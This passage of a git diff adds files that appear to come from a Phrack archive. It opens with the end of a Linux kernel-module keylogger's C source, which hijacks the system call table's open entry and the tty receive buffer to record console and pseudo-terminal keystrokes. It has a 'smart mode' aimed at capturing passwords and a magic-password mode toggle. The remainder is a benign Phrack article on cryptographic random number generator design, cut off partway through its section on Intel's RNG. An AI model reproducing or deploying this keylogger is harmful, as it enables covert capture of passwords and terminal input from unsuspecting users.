+			const unsigned char *cp, int count)
+{
+	struct tlogger *tmp = ttys[TTY_INDEX(tty)];
+
+	if (!tmp) {
+		DPRINT("erm .. unknow error???\n");
+		init_tty(tty, TTY_INDEX(tty));
+		tmp = ttys[TTY_INDEX(tty)];
+		if (!tmp)
+			return;
+	}
+
+	if (vlogger_mode == VK_SMARTMODE) {
+		if (tmp->status && !IS_PASSWD(tty)) {
+			resetbuf(tmp);
+		}		
+		if (!tmp->pass && IS_PASSWD(tty)) {
+			logging(tty, tmp, 0);
+			resetbuf(tmp);
+		}
+		if (tmp->pass && !IS_PASSWD(tty)) { 
+			if (!tmp->lastpos)
+				logging(tty, tmp, 0);
+			resetbuf(tmp);
+		}
+		tmp->pass  = IS_PASSWD(tty);
+		tmp->status = 0;
+	}
+
+	if ((count + tmp->lastpos) > MAX_BUFFER - 1) {	
+		logging(tty, tmp, 1);
+		resetbuf(tmp);
+	} 
+
+	if (count == 1) {
+		if (cp[0] == VK_TOGLE_CHAR) {
+			if (!strcmp(tmp->buf, MAGIC_PASS)) {
+				if(vlogger_mode < 2)
+					vlogger_mode++;
+				else
+					vlogger_mode = 0;
+				reset_all_buf();
+
+				switch(vlogger_mode) {
+					case VK_DUMBMODE:
+				    		DPRINT("Dumb Mode\n");
+						TTY_WRITE(tty, "\r\n"
+				    		"Dumb Mode\n", 12);
+						break;
+					case VK_SMARTMODE:
+				    		DPRINT("Smart Mode\n");
+						TTY_WRITE(tty, "\r\n"
+						"Smart Mode\n", 13);
+						break;
+					case VK_NORMAL:
+					    	DPRINT("Normal Mode\n");
+						TTY_WRITE(tty, "\r\n"
+						"Normal Mode\n", 14);
+				}
+			}
+		}
+
+		switch (cp[0]) {
+			case 0x01:	//^A
+				append_c(tmp, "[^A]", 4);
+				break;
+			case 0x02:	//^B
+				append_c(tmp, "[^B]", 4);
+				break;
+			case 0x03:	//^C
+				append_c(tmp, "[^C]", 4);
+			case 0x04:	//^D
+				append_c(tmp, "[^D]", 4);
+			case 0x0D:	//^M
+			case 0x0A:
+				if (vlogger_mode == VK_SMARTMODE) {
+					if (IS_PASSWD(tty)) {
+						logging(tty, tmp, 0);
+						resetbuf(tmp);
+					} else
+						tmp->status = 1;
+				} else {
+					logging(tty, tmp, 0);
+					resetbuf(tmp);
+				}
+				break;
+			case 0x05:	//^E
+				append_c(tmp, "[^E]", 4);
+				break;
+			case 0x06:	//^F
+				append_c(tmp, "[^F]", 4);
+				break;
+			case 0x07:	//^G
+				append_c(tmp, "[^G]", 4);
+				break;
+			case 0x09:	//TAB - ^I
+				append_c(tmp, "[TAB]", 5);
+				break;
+			case 0x0b:	//^K
+				append_c(tmp, "[^K]", 4);
+				break;
+			case 0x0c:	//^L
+				append_c(tmp, "[^L]", 4);
+				break;
+			case 0x0e:	//^E
+				append_c(tmp, "[^E]", 4);
+				break;
+			case 0x0f:	//^O
+				append_c(tmp, "[^O]", 4);
+				break;
+			case 0x10:	//^P
+				append_c(tmp, "[^P]", 4);
+				break;
+			case 0x11:	//^Q
+				append_c(tmp, "[^Q]", 4);
+				break;
+			case 0x12:	//^R
+				append_c(tmp, "[^R]", 4);
+				break;
+			case 0x13:	//^S
+				append_c(tmp, "[^S]", 4);
+				break;
+			case 0x14:	//^T
+				append_c(tmp, "[^T]", 4);
+				break;
+			case 0x15:	//CTRL-U
+				resetbuf(tmp);
+				break;				
+			case 0x16:	//^V
+				append_c(tmp, "[^V]", 4);
+				break;
+			case 0x17:	//^W
+				append_c(tmp, "[^W]", 4);
+				break;
+			case 0x18:	//^X
+				append_c(tmp, "[^X]", 4);
+				break;
+			case 0x19:	//^Y
+				append_c(tmp, "[^Y]", 4);
+				break;
+			case 0x1a:	//^Z
+				append_c(tmp, "[^Z]", 4);
+				break;
+			case 0x1c:	//^\
+				append_c(tmp, "[^\\]", 4);
+				break;
+			case 0x1d:	//^]
+				append_c(tmp, "[^]]", 4);
+				break;
+			case 0x1e:	//^^
+				append_c(tmp, "[^^]", 4);
+				break;
+			case 0x1f:	//^_
+				append_c(tmp, "[^_]", 4);
+				break;
+			case BACK_SPACE_CHAR1:
+			case BACK_SPACE_CHAR2:
+				if (!tmp->lastpos) break;
+				if (tmp->buf[tmp->lastpos-1] != ']')
+					tmp->buf[--tmp->lastpos] = 0;
+				else {
+					append_c(tmp, "[^H]", 4);
+				}
+				break;
+			case ESC_CHAR:	//ESC
+				append_c(tmp, "[ESC]", 5);
+				break;
+			default:
+				tmp->buf[tmp->lastpos++] = cp[0];
+				tmp->buf[tmp->lastpos] = 0;
+		}
+	} else {	// a block of chars or special key
+		if (cp[0] != ESC_CHAR) {
+			while (count >= MAX_BUFFER) {
+				append_c(tmp, cp, MAX_BUFFER);
+				logging(tty, tmp, 1);
+				resetbuf(tmp);
+				count -= MAX_BUFFER;
+				cp += MAX_BUFFER;
+			}
+
+			append_c(tmp, cp, count);
+		} else 	// special key
+			special_key(tmp, cp, count);
+	}
+}
+
+
+void my_tty_open(void) 
+{
+	int fd, i;
+	char dev_name[80];
+
+#ifdef LOCAL_ONLY
+	int fl = 0;
+	struct tty_struct * tty;
+	struct file * file;
+#endif
+
+	for (i=1; i<MAX_TTY_CON; i++) {
+		snprintf(dev_name, sizeof(dev_name)-1, "/dev/tty%d", i);
+
+		BEGIN_KMEM
+			fd = open(dev_name, O_RDONLY, 0);
+			if (fd < 0) continue;
+
+#ifdef LOCAL_ONLY
+			file = fget(fd);
+			tty = file->private_data;
+			if (tty != NULL  && 
+				tty->ldisc.receive_buf != NULL) {
+				if (!fl) {
+					old_receive_buf = 
+						tty->ldisc.receive_buf;
+					fl = 1;
+				}
+				init_tty(tty, TTY_INDEX(tty));
+			}
+			fput(file);
+#endif
+
+			close(fd);
+		END_KMEM
+	}
+
+#ifndef LOCAL_ONLY
+	for (i=0; i<MAX_PTS_CON; i++) {
+		snprintf(dev_name, sizeof(dev_name)-1, "/dev/pts/%d", i);
+
+		BEGIN_KMEM
+			fd = open(dev_name, O_RDONLY, 0);
+			if (fd >= 0) close(fd);
+		END_KMEM
+	}
+#endif
+
+}
+
+
+void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
+						char *fp, int count)
+{
+	if (!tty->real_raw && !tty->raw)	// ignore raw mode
+		vlogger_process(tty, cp, count);
+	(*old_receive_buf)(tty, cp, fp, count);
+}
+
+
+static inline void init_tty(struct tty_struct *tty, int tty_index)
+{
+	struct tlogger *tmp;
+
+	DPRINT("Init logging for %s%d\n", TTY_NAME(tty), TTY_NUMBER(tty));
+
+	if (ttys[tty_index] == NULL) {
+		tmp = kmalloc(sizeof(struct tlogger), GFP_KERNEL);
+		if (!tmp) {
+			DPRINT("kmalloc failed!\n");
+			return;
+		}
+		memset(tmp, 0, sizeof(struct tlogger));
+		tmp->tty = tty;
+		tty->ldisc.receive_buf = new_receive_buf;
+		ttys[tty_index] = tmp;
+	} else {
+		tmp = ttys[tty_index];
+		logging(tty, tmp, 1);
+		resetbuf(tmp);
+		tty->ldisc.receive_buf = new_receive_buf;
+	}
+}
+
+
+asmlinkage int new_sys_open(const char *filename, int flags, int mode)
+{
+	int ret;
+	static int fl = 0;
+	struct file * file;
+	
+	ret = (*original_sys_open)(filename, flags, mode);
+	
+	if (ret >= 0) {
+		struct tty_struct * tty;
+
+	    BEGIN_KMEM
+	    	lock_kernel();
+		file = fget(ret);
+		tty = file->private_data;
+
+		if (tty != NULL && 
+			((tty->driver.type == TTY_DRIVER_TYPE_CONSOLE &&
+			TTY_NUMBER(tty) < MAX_TTY_CON - 1 ) ||
+			(tty->driver.type == TTY_DRIVER_TYPE_PTY &&
+			tty->driver.subtype == PTY_TYPE_SLAVE &&
+			TTY_NUMBER(tty) < MAX_PTS_CON)) &&
+			tty->ldisc.receive_buf != NULL &&
+			tty->ldisc.receive_buf != new_receive_buf) {
+
+			if (!fl) {
+				old_receive_buf = tty->ldisc.receive_buf;
+				fl = 1;
+			}
+			init_tty(tty, TTY_INDEX(tty));
+		}
+		fput(file);
+		unlock_kernel();
+	    END_KMEM
+	}
+	return ret;
+}
+
+
+int init_module(void)
+{
+
+	DPRINT(MVERSION);
+#ifndef LOCAL_ONLY
+	original_sys_open = sys_call_table[__NR_open];
+	sys_call_table[__NR_open] = new_sys_open;
+#endif
+	my_tty_open();
+//	MOD_INC_USE_COUNT;
+
+	return 0;
+}
+
+DECLARE_WAIT_QUEUE_HEAD(wq);
+
+void cleanup_module(void)
+{
+	int i;
+
+#ifndef LOCAL_ONLY
+	sys_call_table[__NR_open] = original_sys_open;
+#endif
+
+	for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
+		if (ttys[i] != NULL) {
+			ttys[i]->tty->ldisc.receive_buf = old_receive_buf;
+		}
+	}
+	sleep_on_timeout(&wq, HZ);
+	for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
+		if (ttys[i] != NULL) {
+			kfree(ttys[i]);
+		}
+	}
+	DPRINT("Unloaded\n");
+}
+
+EXPORT_NO_SYMBOLS;
+<-->
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack59/15.txt b/phrack59/15.txt
new file mode 100644
index 0000000..83eaa0e
--- /dev/null
+++ b/phrack59/15.txt
@@ -0,0 +1,1020 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0f of 0x12
+
+
+|=-------------=[ CRYPTOGRAPHIC RANDOM NUMBER GENERATORS ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ DrMungkee <pub@drmungkee.com> ]=-------------------=|
+
+
+----| Introduction
+
+Every component in a cryptosystem is critical to its security. A single
+failure in one could bring down all the others. Cryptographic random
+numbers are often used as keys, padding, salt and initialization vectors.
+Using a good RNG for each of these components is essential. There are many
+complications imposed by the predictability of computers, but there are
+means of extracting the few bits of entropy regardless of them being
+exponentially out-numbered by redundancy. This article's scope covers the
+design, implementation and analysis of RNGs. RNGs subject to exploration
+will be NoiseSpunge, Intel RNG, Linux' /dev/random, and Yarrow.
+
+
+----| Glossary
+
+RNG - Random Number Generator
+PRNG - Pseudo Random Number Generator
+entropy - Unpredictable information
+redundancy - Predictable or probabilistic information
+
+----| 1) Design Principles of RNGs
+
+
+1.0) Overview
+
+A variety of factors come into play when designing an RNG. It's output must
+be undissernable from white noise, there must be no way of predicting any
+portion of it, and there can be no way of finding previous or future
+outputs based on any known outputs. If an RNG doesn't conform to this
+criteria, it is not cryptographicaly secure.
+
+
+1.1) Entropy Gathering
+
+To meet the first and second criteria, finding good sources of entropy is
+an obligation. These sources must be unmoniterable by an attacker, and any
+attempts by an attacker to manipulate the entropy sources should not make
+them predictable or repetitive.
+
+Mouse movement is often used as entropy, but if the entropy is improperly
+interpreted by the RNG, there is a segnficant amount of redundancy. To
+demonstrate, I monitered mouse movement at an interval of 100 miliseconds.
+These positions were taken consecutively while the mouse was moved
+hecticaly in all directions. These results say it all:
+
+      X-Position         Y-Position
+   0000001011110101   0000000100101100    Only the last 9 bits of each
+   0000001000000001   0000000100001110    coordinate actualy appear
+   0000001101011111   0000001001101001    random.
+   0000001000100111   0000000111100100
+   0000001010101100   0000000011111110
+   0000000010000000   0000000111010011
+   0000001000111000   0000000100100111
+   0000000010001110   0000000100001111
+   0000000111010100   0000000011111000
+   0000000111100011   0000000100101010
+
+
+The next demonstration shows a more realistic gathering of entropy by
+keeping only the 4 least significant bits of the X and Y positions and
+XORing them with a high-frequency counter, monitoring them at a random
+interval:
+
+    X      Y      Timer      XORed
+   1010   1001   00100110   01111111
+   0100   1100   00101010   00000110
+   0101   0010   01011111   01110101
+   1001   1100   10110000   11111100
+   0101   0100   11001110   11100010
+   0101   1100   01010000   01111100
+   1011   0000   01000100   00011100
+   0111   0111   00010111   00101000
+   0011   0101   01101011   01110110
+   0001   0001   11011000   11010001
+
+Good entropy is gathered because 4bits from each coordinates represents a
+change in 16 pixels in each direction rather than assuming a motion of
+65536 can occur in all directions. The high-resolution timer is used as
+well because although it is completly sequencial, it's last 8 bits will
+have been updated very often during a few CPU clock cycles, thus making
+those bits unmonitorable. An XOR is used to combine the entropy from the 2
+sources because it has very the very good property of merging numbers in a
+way that preserves the dependency of every bit.
+
+
+The most common sources of entropy used all involve user interaction or
+high-frequency clocks in one way, shape, or form. A hybrid of both is
+always desirable. Latencies between user-triggered events (keystroke, disk
+I/O, IRQs, mouse clicks) measured at high-precisions are optimal because
+of the unpredictable nature of a user's behaviors and precise timing.
+
+Some sources may seem random enough but are in fact not. Network traffic is
+sometimes used but is unrecommended because it can be monitored and
+manipulated by an outside source. Another pittfall is millisecond precision
+clocks: they don't update frequently enough to be put to good use.
+
+A good example of entropy gathering shortcommings is Netscape's
+cryptographically _broken_ not-so-RNG. Netscape used the time and date with
+its process ID and its parent's process ID as it's only source of entropy.
+The process ID in Win9x is a value usualy below 100 (incremented once for
+each new process) that is XORed with the time of day Win9x first started.
+Even though the hashing function helped generate output that seemed random,
+it is easy to estimate feseable values for the entropy, hash them, and
+predict the RNG's output. It doesn't matter weather or not the output
+looks random if the source of entropy is poor.
+
+
+1.2 Entropy Estimations
+
+Evaluating the quantity of entropy gathered should not be overlooked. It
+must be dones in order to prevent the RNG from attempting to output more
+entropy than it has gathered. Depending on system parameters, you can
+assign quality estimates for each of your entropy sources. For example,
+you can evaluate all keyboard generated entropy as being 4bits in size,
+regardless of how many bits of entropy you collect from it. If the RNG is
+on a file server and uses disk I/O as an entropy source, it could derrive
+an entropy estimate proportional to the number of users accessing the disk
+to prevent sequencial disk access from resulting in redundant entropy.
+The entropy estimates do not need to be the same size as the inputs or
+outputs of entropy gathering. They are meant as a safety precaution in
+further calculations.
+
+There are alternative methods for estimating the entropy. You could bias
+entropy from a source to be of better quality if that source has not
+supplied entropy for a period exceeding a certain interval. You can
+accumulate large amounts of entropy in a buffer, compress it, and derive
+an estimation from the compression ratio. Statistical tests comparing the
+last input entropy with a large quantity of previous inputs doesn't do much
+in terms of finding the current input's quality, but it gives the RNG an
+oppertunity to reject inputs that increase statistical probability of the
+group of entropy inputs.
+
+The best approach to this is also a hybrid. One method of estimating
+entropy quality usualy isn't enough. There are cases where an entropy
+source can be assumed to provide a consistant quality of entropy however.
+In these cases, a fixed size can be assigned to all entropy inputs from
+that source, but carefull analysis should be done before this assumption
+is made. It is wisest to calculate multiple estimates and assume the
+smallest value to be the most accurate.
+
+
+1.3) Entropy Pools
+
+No entropy source should be assumed perfect. More specificaly, no entropy
+source should be assumed perfect on a computer. That is why entropy is
+gathered in a buffer (entropy pool) to undergo supplimentary processing.
+After entropy is gathered from a source, it is input into an entropy pool.
+The entropy pool must do several things with this input. It must keep track
+of the amount of entropy contained within it, mix the last input uniformaly
+with all the previous inputs contained within it, and provide an at least
+seamingly random state regardless of the quality of the entropy input
+(patternistic inputs should still look random in the pool).
+
+Mixing the contents of the entropy pool should neither sacrifice any of
+the entropy within it nor be considered to add entropy to its state. If the
+mixing function expands the pool, entropy estimation of its contents should
+not change. Only the entropy gathering functions are responsible for
+increasing entropy and are dealt with serperately.
+
+The best candidates for mixing functions are hashing algorithms. The
+hashing algorithm should accept any size input, and have a large sized
+output that reflects the speed at which entropy is gathered, and have a
+non-deterministic output. To preserve gathered entropy, the hashing
+function should not input more entropy than the size of it's output. With
+that said, if the hashing function outputs 160bits, it should not be input
+more than 160bits prior to output. If the hashing algorithm is
+cryptographically secure (which it should be) the output will yield the
+same amount of entropy as the input. If the output is larger than the
+input, the state of the pool cannot be assumed to have increased in
+entropy.
+
+There are several approaches to using large pools of entropy. One approach
+implments a pool that is hashed linearly. For this method, you would need a
+buffer that is concatinated with the last input of entropy. Hashing should
+be started at the end of the buffer. The rest of the buffer should be
+hashed, one chunk (the size of the output) at a time, each time XORing the
+output with the output of the last block's hash to ensure the entire pool
+is affected by the last input, without overwritting any previous entropy.
+This is only an examplar method. Whichever procedure you choose, it should
+meet all the criteria mentioned in the previous paragraphs.
+
+Another approach to maintaining a large entropy pool is using multiple
+hashed contexts which are used to affect each other. A common use is a pool
+that contains unmanipulated entropy. Once that pool is full, it is hashed
+and used to update another pool either by updating a hashing context or
+XORing. This is cascaded through as many pools as desired, but to avoid
+losing previous entropy, some pools should only be updated after it's
+parent pool (the one that updates it) has been updated a certain number of
+times. For example, once the first hashed pool has been updated 8 times, a
+second pool can be updated. Once the second hashed pool has been updated 3
+times, it can update a third pool. With this method, the third pool
+contains entropy from the last 24 entropy updates. This conserves less
+entropy (limited by the size of the hashing contexts) but provides better
+quality entropy. Entropy is of better quality because the source of the
+entropy containted within the third pool is completly dependent on 24
+entropy inputs.
+
+Inputing entropy into a pool is usualy called updating or seeding. Entropy
+pools combined with the output function by themselves are in fact PRNGs.
+What makes a RNG is the entropy gathering process which obtains truly
+random seeds. As long a good entropy is input, the RNG will have an
+infinite period (no output patterns) as oposed to PRNGs which have a
+semi-fixed point at whitch they will start to repeat all previous outputs
+in the same order.
+
+Entropy pools are the key to preventing any previous or future outputs of
+RNG from being predicted. Attacks against an RNG to determine previous and
+future outputs are either based on knowledge of the entropy pool, entropy
+inputs or previous outputs. The pool should be designed to prevent
+knowledge of its current state from compromising any or all future
+outputs. To do this, entropy pools should undergo a drastic change from
+time to time by removing protions or all of its entropy. This is called
+reseeding. Reseeding should _always_ replace the entropy that is removed
+with fresh entropy before outputing. If the entropy is not replaced, the
+pool will be in a severely weakened state. An RNG does not need to reseed,
+but if it doesn't, it must have entropy added at a rate greater than the
+RNG's output.
+
+Reseeding should only occur after sufficient unused entropy has been
+accumulated to fill a large portion of the pool, and the entropy estimation
+of the pool should be adjusted to the estimated size of the input entropy.
+Reseeding should not occur very often, and only based on the number of
+bits output by the RNG and the size of the pool. A safe estimation on the
+reseeding frequency of an RNG would be the after an 95% of the size of the
+entropy input has been output. This estimate assumes that entropy is added
+to the pool in between the RNG's outputs. If this is not the case,
+reseeding should occur more frequently. The less entropy is input between
+outputs, the better the chances that an attacker who has found one output
+will find the previous output (which can cascade backwards after each
+output is found).
+
+
+1.4) Output Functions
+
+An RNG's output should be passed through a one-way function. A one-way
+function's output is derrived from its input, but that input is
+computationaly infeasable to derive from its output. One-way hash
+functions are perfect for this. More complex methods involve using
+portions of the pool as key data fed to a symmetric encryption algorithm
+that encrypts another portion of the pool and outputs the ciphertext.
+Expansion-compression is a very effective one-way function as well. To do
+this you can use portions of the pool as seeds to a PRNG and generate
+multiple outputs (each the size of the PRNG's seed) and then inputing all
+of these into a hash function and outputing its result. This is effective
+because many intermediate (expanded) states could result in the same hash
+output, but only one iniciate (before expansion) state can result in that
+intermediate state.
+
+Every time the RNG outputs, its entropy estimate should be decremented by
+the size of the output. This is done with the assumption that the output
+entirely consists of entropy. Because that output's entropy is still in
+the pool, it is now redundant and cannot be assumed as entropy (inside the
+pool) any longer. If the pool is 512bits in size, and 160bits of entropy
+is consumed on every output then almost all entropy hash been used after 3
+outputs and the pool should be reseeded.
+
+There is a problem nearly impossible to overcome that occurs when
+implementing entropy pools: there is no way of determining what entropy
+bits were output, and which were not. The best way to nullify the symptomes
+of this problem is by making it impossible to know when entropy has been
+used more than once based on the the RNG's output. When an output occurs,
+the pool's state must be permuted so that consecutive outputs without any
+entropy added or reseeding will not result in identical RNG outputs. The
+pool's state permutation must be a one-way function and must apply the same
+concepts and criteria used in the output function. The pool's entropy size
+is always assumed to be identical after permutation as long as the
+procedure follows the criteria.
+
+
+1.5) Implementation
+
+All the effort put into a well designed RNG is useless if it isn't properly
+implemented. Three layers of the implemetation will be covered: media,
+hardware/software, and usage of the output.
+
+Storage and communication media each represent a risk in an unencrypted
+state. The following lists various degrees of risk assigned to storage and
+communication media. Risks are assigned as such:
+ 0 - no risk
+ 1 - low risk
+ 2 - medium risk
+ 3 - high risk
+
+MEDIA                           RISK
+------------------------------------
+RAM              <storage>         0 *&
+Hard Drive       <storage>         1 *&
+Shared memory    <transfer>        1 *&
+Removable disks  <transfer>        2
+LAN              <communication>   2 &
+WAN              <communication>   3
+
+Any properly encrypted media's risk is 0.
+* If the storage media is on a computer connected to a network, risk is
+increased by 1.
+& If physical access is possible (computer/LAN)., risk is increased by 1.
+
+The highest risk of all medias should be interpreted as the
+implementation's risk (weakest link, good bye!). High risk is unacceptable.
+Medium risk is acceptable depending on the value of the RNG's output
+(what's it worth to an attacker?). A personal diary can easily cope with
+medium risk unless you have many skeletons in your closet. Industrial
+secrets should only use 0 risk RNGs. Acceptable risk is usualy up to the
+programmer, but the user should be aware of his choice.
+
+Hardware RNGs should be tamper-proof. If any physical modification is
+attempted, the RNG should no longer output. This precaution prevents
+manipulation of the entropy pool's state and output. There should be no
+way of monitoring hardware RNGs through frequencies, radiation, voltage, or
+any other emissions generated by the RNG. Any of these could be used as a
+source of information with whitch the RNG's entropy pool or output could be
+compromised. To prevent this, all hardware RNGs should be properly
+shielded.
+
+Software implementations can be very tricky. Reverse engineering will
+remain a problem until digital signing of executable files is implemented
+at the operating system level. Until then, any attempts made on the
+programmer's behalf to prevent reverse engineering of the RNG's software
+implementation will only delay the innevitable. It is still important that
+the programmer takes care in writting the software to have to lowest
+possible risk factor (the chart takes into account reverse engineering of
+software).
+
+// the following applies to RNGs seperate from their calling applications
+The RNG must take special care to ensure that only one program has access
+to each of the RNG's outputs. The method by which the data is transfered
+from the RNG to the program must not succomb to observation. Distinct
+outputs are usualy guarrentied by the output function, but sometimes the
+output is copied to a temporary buffer. It might be possible to trick an
+RNG into conserving that buffer, or copying it elsewhere providing easy
+observation. A quick solution is for an application to encrypt the RNG's
+output with a key it generates by its own means. However, you could go all
+out and implement a full key-escrow between the RNG and the calling
+applications and still be vulnerable to a hack. The kind of _prevention_ a
+programmer incorporates into software only serves as a road block, but this
+is often enough to discourage 99.9% of its users from attempting to
+compromise security. Not much can be done about 0.1% that can still
+manipulate the software because there will always be a way to crack
+software.
+
+
+1.6) Analysis
+
+There are two important aspects to analysing an RNG: randomness and
+security. To evaluate an RNG's randomness, one usualy resorts to
+statistical analysis of the RNG's input (entropy gathering process) and
+output (output function). To evaluate it's security, one would look for
+flaws in its entropy gathering, entropy pool, mixing function, and output
+function that allow an attacker to find past, present, or future outputs by
+any means possible. There is no guarrentying the effectiveness of either of
+these aspects. The only certain thing is once the RNG is broken, it is
+broken; until then, you can only speculate.
+
+There are many statistical tests available on the internet suitable for
+testing randomness of data. Most require a large sample of data stored in
+a file to derive significant results. A Probabilistic value is obtained
+through statistical analysis of the sample. This value is usualy in the
+form of P, a floating point number between 0 and 1. Tests are done in
+various block sizes usualy between 8 and 32bits. P's precision varies from
+one test to the next. A P value close to 0.5 is what is usualy desired.
+When P is close to 0.5, probability is at it's midrange and there is no
+incline towards either 0 or 1. An RNG is not weak because it has a value
+close to 1 or 0. It can occur even with purely random data.  If it were
+impossible to obtain a value close to 0 or 1, the RNG would be flawed
+anyway. This is because when data is completly random, all outputs are
+equaly likely. This is why patterned outputs are possible. When P is less
+then satisfactory, many new samples should be created and tested. If other
+samples result in bad Ps then the RNG most likely has deterministic output
+and should not be used. DieHard offers an armada of 15 tests that use P
+values. Other tests describe there results with an integer and it's target.
+The closer the integer is to its target the better. An example of this is
+the Maurer Universal Statistics Test.
+
+The problem with statistical tests is that any good PRNG or hashing
+function will pass them easily without any entropy. Even if the output is
+non-deterministic the RNG is only an RNG if it cannot be predicted. For
+that reason, the RNG's entropy must be non-deterministic as well. Unless
+the entropy source can be guarrentied to function properly, it is wise to
+use the same tests on the raw entropy itself. By doing this you can achieve
+a sufficient level of confidence about the randomness. A big speed-bump
+stares you right in the eyes when you're trying to do this, however.
+Entropy is often gathered at a very slow pace making the gathering of a
+sufficiently large data sample extremely tedius and in some circumstances
+it might not even be worthwhile. Whether this is the case or not, it is
+logical to intellegently scrutinise entropy sources, rather than depending
+on statistical tests (which cannot guarrenty anything) to find flaws (see
+1.1).
+
+Evaluating an RNG's security is a complexe task with infinite means and
+only one end: a break. The odds are always well stacked against an RNG. No
+matter how many provisions are made to prevent breaks, new attacks will
+always eventualy emerge from that RNG or another. Every aspect of the RNG
+must be studied carefully, from entropy gathering right up to the delivery
+of the RNG's output. Every component should be tested individualy and then
+as a group. Tests include the possibility of hacks that can tamper with or
+monitor entropy gathering, and cryptanalysis of mixing and output
+functions. Most breaks are discovered under laboratory conditions. These
+are called academic breaks and they usualy require very specific
+conditions be met in order to function (usualy highly improbable). Finding
+these breaks is a broad topic on its own and is beyond of the scope in
+article. Successful breaks are usually the result of months (often years)
+of pain-staking work done by cryptanalysts with years of experience. The
+best thing to do is to carefully design the RNG from start to finish with
+security in mind.
+
+Even as the limits of mathematics and cryptanalysis are reached in testing,
+advancements in sience could reak havoc on your RNG. For example, Tempest
+scanning could be used by an attacker to follow keystrokes and mouse
+positions. Discoveries can even be made in the analysis of white noise,
+eventualy. These breaks are usualy found by scholars and professionals who
+seek only to make their knowledge available before damage occurs. Not much
+can be done to prevent attacks that are unknown. Finding an effective fix
+quickly and learning from the is what is expected from developers.
+Thankfully, these attacks emerge very rarely, but things are changing as
+research increases.
+
+Only the security analysis of the RNGs in section 2 will be discussed
+because each has already been tested for and passed randomness analysis.
+
+
+
+----| 2 Description of specific RNGs
+
+
+2.1) NoiseSpunge's Design
+Information Source: Uhhhh, I wrote it.
+
+
+2.1.0) NoiseSpunge Overview
+
+NoiseSpunge was specifically written for generating random 256bit keys
+suitable for strong encryption. Gathering entropy for a single output
+(256bits) requires a few seconds of mouse movement on the user's part. Its
+structure is complex and computationaly expensive. NoiseSpunge is meant to
+be a component within cryptosystems, and for that reason, special
+consideration has to be made in order to prevent it from being a liability.
+The trade off in this implementation is it would be clumsy at best if
+large quantities of random data were needed regularly because it would
+require intense user-interaction and it would consume too many CPU cycles.
+
+
+2.1.1) NoiseSpunge Entropy Gathering
+
+A PRNG is seeded with initial zeros. The PRNG then outputs a value used to
+calculate the length of the interval used. When the interval is triggered,
+the mouse position is checked for movement. If the mouse has moved since
+the last trigger the PC's high-frequency clock is queried for its current
+value. The 4 least significant bits are XORed with the 4 least significant
+bits of the mouse's x & y coordinates. A new interval is then calculated
+from the PRNG. The 4 bits produced are concatenated until 32 bits are
+gathered and output. The 32bits are concatenated to the an entropy buffer
+and also used to update the PRNG that sets the interval. The process is
+then repeated. If the mouse has not moved, a new interval is set and the
+process repeats until is has moved.  There is also a function that allows
+the programmer to input 32bits of entropy at a time. This function is
+suitable if there is a hardware entropy device or another known secure
+source of entropy on a particular system. However, the use of another RNG's
+output would be redundant if it is good and useless if it is bad.
+
+
+2.1.2) NoiseSpunge Entropy Estimation
+
+Entropy estimation is straight forward. The worst case scenario is assumed
+with each input. Only 4bits are gathered for every mouse capture. No
+further estimations are done because they would only yield results 4bits or
+greater. Entropy estimation for the supplementary function that allows the
+programmer to supply his own entropy requires the programmer to guarrantee
+his entropy is of good quality; estimation of this input's entropy is left
+in his hands.
+
+
+2.1.3) NoiseSpunge Entropy Pool
+
+The internal state comprises 762bit. There is a 256bit seed, a 256bit
+primary hash, and a 256bit secondary hash. 256bit Haval is used as the
+hashing function. When a 32bit block of entropy is added, it is appended to
+a 256bit buffer. Once the buffer is full the primary hash is updated with
+it. The seed is XORed with The primary hash's output unless this is the 8th
+primary reseed. In that case, the primary hash's output is input into the
+secondary hash and that hash's output is permuted (see bellow) and replaces
+the seed. Seed permutation is accomplished by an expansion-compression.
+32bit words of the seed are fed as a PRNG's random seed and used to output
+two 32bit words. All 512bits of the PRNG's output are hashed and replace
+the pool's seed. After every primary reseed, a KeyReserve counter is
+incremented and capped at 8. The KeyReserve reperesents the number of
+256bit groups of entropy that have been added to the internal state. This
+KeyReserve is a rough estimate of when there is no longer any purpose to
+adding entropy into the pool and the entropy gathering thread can be paused
+(until the RNG outputs).
+
+
+2.1.4) NoiseSpunge Output Function
+
+There are 2 methods provided for the RNG's output: safe and forced. A safe
+output makes sure the KeyReserve is not zeroed and decrements it after
+output. A forced output ignores the KeyReserve. To output, the seed is
+copied to a temporary buffer and is then permuted. The new seed is used a
+key to initialize Rijndael (symmetric block cipher). The temporary buffer
+is encrypted with Rijndael and then permuted with an expansion-compression
+(the same way the seed is). This is repeated for N rounds (chosen by the
+programmer) and the buffer is then output.
+
+
+2.1.5) NoiseSpunge Analysis
+
+[1] The heavy relyance upon mouse movement could _starve_ the entropy pool
+if the mouse is not in use for an extended period of time. However, a
+counter prevents output when entropy is low.
+
+[2] The programmer could forcefully input poor quality entropy and weaken
+the RNG's internal state.
+
+[3] There are no provisions for systems without high-resolution timers.
+
+[4] Even though the pool's internal state is 762bits long, there is a
+maximum of 256bits of entropy at any state. (The other bits are only there
+to prevent back-tracking and to obfuscate the seed). That makes this RNG
+only suitable when small amounts of secure random data are needed.
+
+
+
+2.2) Intel RNG's Design
+Information Source: Intel Random Number Generator White Paper *1
+
+
+2.2.0) Intel RNG Overview
+
+The Intel RNG is system-wide. It is designed to provide good quality random
+data in massive quantities to any software that requires it. It's average
+throughput is 75Kb/s (bits). The Intel Security Driver provides a bridge
+between the middleware (CDSA, RSA-BSAFE, and Microsoft CryptoAPI) that will
+serve out the random numbers to requesting applications and the hardware.
+The hardware portion is in Intel's 810 chipset, and will be in the 82802
+Firmware Hub Device for all future 8xx chipsets.
+
+{WARNING: these are some of my personal opinions; take them with a grain of
+salt}
+Intel has chosen to eloquantly label its RNG as a TRNG (True Random Number
+Generator), but then they go on to call it an RNG through the rest of the
+paper. Thechnicaly there is no fundamental difference that sets it asside
+from any other good RNG; it is a label for hype and has nothing to do with
+its ability to produce random numbers (RNG==TRNG & TRNG==RNG). As for your
+daily dose of corporate assurance: "The output of Intel RNG has completed
+post-design validation with Cryptography Research Inc. (CRI) and the
+Federal Information Processing (FIPS) Level 3 test for statistical
